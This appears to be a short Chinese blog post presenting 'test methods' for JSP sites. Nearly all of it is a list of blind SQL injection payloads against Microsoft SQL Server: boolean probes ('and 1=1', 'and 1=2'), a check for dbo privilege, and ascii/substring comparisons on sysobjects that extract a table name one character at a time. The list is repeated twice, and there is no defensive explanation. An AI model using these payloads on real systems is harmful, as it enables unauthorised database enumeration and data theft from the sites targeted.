博客展示了JSP相关的测试方法,包含如'and 1=1' 'and 1=2'等表达式,以及对数据库对象名称进行字符判断的测试语句,用于相关测试场景。
测试方法
and 1=1
and 1=2
and user_name()='dbo'
AND ascii(lower(substring((select TOP 1 name FROM sysobjects where xtype='U'), 1,1))) > 109
AND ascii(lower(substring((select TOP 1 name FROM sysobjects where xtype='U'), 1,1))) > 111
AND ascii(lower(substring((select TOP 1 name FROM sysobjects where xtype='U'), 1,1))) = 111
............................
...........................
.............................
and 1=1
and 1=2
and user_name()='dbo'
AND ascii(lower(substring((select TOP 1 name FROM sysobjects where xtype='U'), 1,1))) > 109
AND ascii(lower(substring((select TOP 1 name FROM sysobjects where xtype='U'), 1,1))) > 111
AND ascii(lower(substring((select TOP 1 name FROM sysobjects where xtype='U'), 1,1))) = 111
............................
...........................
.............................
扫一扫
1530
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
